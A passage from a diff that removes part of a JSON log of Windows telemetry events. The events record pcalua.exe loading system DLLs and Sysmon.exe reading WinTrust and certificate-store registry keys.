"C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - 
"unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, 
- { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
